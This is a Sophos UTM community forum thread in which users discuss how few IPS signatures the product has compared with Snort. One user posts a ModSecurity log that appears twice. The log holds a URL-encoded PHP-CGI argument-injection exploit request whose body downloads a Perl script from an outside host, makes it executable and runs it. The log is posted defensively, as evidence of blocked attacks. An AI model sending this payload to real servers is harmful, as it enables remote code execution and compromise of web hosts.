Guest User!

You are not Sophos Staff.

Thread Info
  • State Not Answered
  • Replies 17 replies
  • Subscribers 0 subscribers
  • Views 6426 views
  • Users 0 members are here
Options
Suggested

[9.171][QUESTION] rules ips

simby
Why do Sophos have so litel signiture? On pfsense with snort, i have 5 times more, with all optios (Oracle, user agent, netbios,apache, ntp, ftp, smtp,..., .).
Parents
  • 0
    Hi simby. What kind of numbers pattern-wise are you looking for? In total we have ~18000 signatures. of course, many of those will be irrelevant for your network, (old, unneeded, low risk, etc...) and we have spent a lot of development man-hours on optimizing the rule set and intelligently applying patterns, including a new age-dating system.

    If you have some more info to share around your thoughts there, let us know. I am particularly interested if you have experienced any threats getting through your UTM that were caught by PFsense, or if not running both in a chain, if you had any threats penetrate your UTM with IPS enabled that could have been solved by a "missing" pattern.
  • 0 in reply to AngeloC
    Hi Simby,
    do you mean the number of Groups of rules. Thats a thing i told before to astaro and now to sophos. The granularity of the aktivating/deaktivating of rules is not optimal in my opinion.
    My wish is that i want to have more options to manage the rules.
    The possibility of deaktivating rules by now are a little bit insufficient.
    The Options to manage the events are a bit to small too.
    Other Solutions give you much more, maybe you can see wich website/url was loaded while a Packet was dropped, or wich Mail is not delivered while an appendix is seen as bad or the filename of an appendix in wich an packet was dropped.
    But dont understand this wrong i dont want to say use an other solution than the Sophos UTM my wish is to get the UTM better than now. Otherwise some may get an other solution for IPS cause their company wishes more. (i told this as an platinum service company user to Sophos).

    So now hit me please  [;)]
    firebear
  • 0 in reply to firebear_01
    firebear, tahnks, and Yes,... please see this picture & log:

    from my ASL firewall on server behinde Sophos IPS enabled on server:

    (i have many this attack  - from cca. 470/day | +/- 50!!)
    and log of attack:

    --16c5c54d-A--
    [28/Nov/2013:20:44:25 +0100] UpedGAqHk1sAAA-hzzwAAAAJ 109.228.5.29 44817 10.135.147.91 80
     
    --16c5c54d-B--
    POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
    Host: -c
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 198

     
    --16c5c54d-C--
    http://floder.atwebpages.com/b.txt ; fetch http://floder.atwebpages.com/b.txt ; chmod +x b.txt ; perl b.txt ; rm -rf b.txt* "); ?>
     
    --16c5c54d-F--
    HTTP/1.1 403 Forbidden
    Accept-Ranges: bytes
    Transfer-Encoding: chunked
    Content-Type: text/html

     
    --16c5c54d-H--
    Message: [file "/usr/local/apache/modsecurity.d/10_asl_rules.conf"] [line "524"] [id "340165"] [rev "281"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=x22x22 -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?[:$]gg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.
    Action: Intercepted (phase 2)
    Apache-Handler: default-handler
    Stopwatch: 1385667864665591 940089 (- - -)
    Stopwatch2: 1385667864665591 940089; combined=818898, p1=815501, p2=3371, p3=0, p4=0, p5=26, sr=0, sw=0, l=0, gc=0
    WAF: ModSecurity for Apache/2.7.5 (ModSecurity: Open Source Web Application Firewall 201311281035.
    Server: Apache
    Engine-Mode: "ENABLED"

     
    --16c5c54d-Z--

    If i have pfsense, i have 5-10, but stop ASL. Now, how secure is this sophos for website when hosted in a company server?
Reply
  • 0 in reply to firebear_01
    firebear, tahnks, and Yes,... please see this picture & log:

    from my ASL firewall on server behinde Sophos IPS enabled on server:

    (i have many this attack  - from cca. 470/day | +/- 50!!)
    and log of attack:

    --16c5c54d-A--
    [28/Nov/2013:20:44:25 +0100] UpedGAqHk1sAAA-hzzwAAAAJ 109.228.5.29 44817 10.135.147.91 80
     
    --16c5c54d-B--
    POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
    Host: -c
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 198

     
    --16c5c54d-C--
    http://floder.atwebpages.com/b.txt ; fetch http://floder.atwebpages.com/b.txt ; chmod +x b.txt ; perl b.txt ; rm -rf b.txt* "); ?>
     
    --16c5c54d-F--
    HTTP/1.1 403 Forbidden
    Accept-Ranges: bytes
    Transfer-Encoding: chunked
    Content-Type: text/html

     
    --16c5c54d-H--
    Message: [file "/usr/local/apache/modsecurity.d/10_asl_rules.conf"] [line "524"] [id "340165"] [rev "281"] [msg "Atomicorp.com WAF Rules: Uniencoded possible Remote File Injection attempt in URI (AE)"] [data "/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=x22x22 -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n"] [severity "CRITICAL"] Access denied with code 403 (phase 2). Pattern match "=(?[:$]gg|gopher|data|php|zlib|(?:ht|f)tps?)://" at REQUEST_URI.
    Action: Intercepted (phase 2)
    Apache-Handler: default-handler
    Stopwatch: 1385667864665591 940089 (- - -)
    Stopwatch2: 1385667864665591 940089; combined=818898, p1=815501, p2=3371, p3=0, p4=0, p5=26, sr=0, sw=0, l=0, gc=0
    WAF: ModSecurity for Apache/2.7.5 (ModSecurity: Open Source Web Application Firewall 201311281035.
    Server: Apache
    Engine-Mode: "ENABLED"

     
    --16c5c54d-Z--

    If i have pfsense, i have 5-10, but stop ASL. Now, how secure is this sophos for website when hosted in a company server?
Children
No Data
Unfiltered HTML